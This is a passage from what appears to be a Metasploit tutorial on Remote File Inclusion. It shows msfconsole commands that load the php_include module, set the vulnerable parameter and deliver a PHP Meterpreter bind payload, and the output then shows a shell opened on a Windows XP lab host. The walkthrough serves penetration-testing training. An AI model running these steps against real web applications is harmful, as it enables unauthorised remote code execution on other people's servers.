PHP Meterpreter

The Internet is littered with improperly coded web applications with multiple vulnerabilities being disclosed on a daily basis. One of the more critical vulnerabilities is Remote File Inclusion (RFI) that allows an attacker to force PHP code of their choosing to be executed by the remote site even though it is stored on a different site. Recently, Metasploit published not only a php_include module but also a PHP Meterpreter payload. The php_include module is very versatile as it can be used against any number of vulnerable webapps and is not product-specific.

In order to make use of the file inclusion exploit module, you will need to know the exact path to the vulnerable site. Loading the module in Metasploit, we can see a great number of options available to us.

msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > show options

Module options:

   Name      Current Setting                                                      Required  Description
   ----      ---------------                                                      --------  -----------
   PATH      /                                                                    yes       The base directory to prepend to the URL to try
   PHPRFIDB  /usr/share/metasploit-framework/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
   PHPURI                                                                         no        The URI to request, with the include parameter changed to XXpathXX
   Proxies                                                                        no        Use a proxy chain
   RHOST                                                                          yes       The target address
   RPORT     80                                                                   yes       The target port
   SRVHOST                                                              yes       The local host to listen on.
   SRVPORT   8080                                                                 yes       The local port to listen on.
   URIPATH                                                                        no        The URI to use for this exploit (default is random)
   VHOST                                                                          no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

The most critical option to set in this particular module is the exact path to the vulnerable inclusion point. Where we would normally provide the URL to our PHP shell, we simply need to place the text “XXpathXX” and Metasploit will know to attack this particular point on the site.

msf exploit(php_include) > set PHPURI /rfi_me.php?path=XXpathXX
PHPURI => /rfi_me.php?path=XXpathXX
msf exploit(php_include) > set RHOST

In order to further show off the versatility of Metasploit, we will use the PHP Meterpreter payload.

msf exploit(php_include) > set PAYLOAD php/meterpreter/bind_tcp
PAYLOAD => php/meterpreter/bind_tcp
msf exploit(php_include) > exploit

[*] Started bind handler
[*] Using URL:
[*]  Local IP:
[*] PHP include server started.
[*] Sending stage (29382 bytes) to
[*] Meterpreter session 1 opened ( -> at 2010-08-21 14:35:51 -0600

meterpreter > sysinfo
Computer: V-XPSP2-SPLOIT-
OS      : Windows NT V-XPSP2-SPLOIT- 5.1 build 2600 (Windows XP Professional Service Pack 2) i586
meterpreter >

Just like that, a whole new avenue of attack is opened up using Metasploit.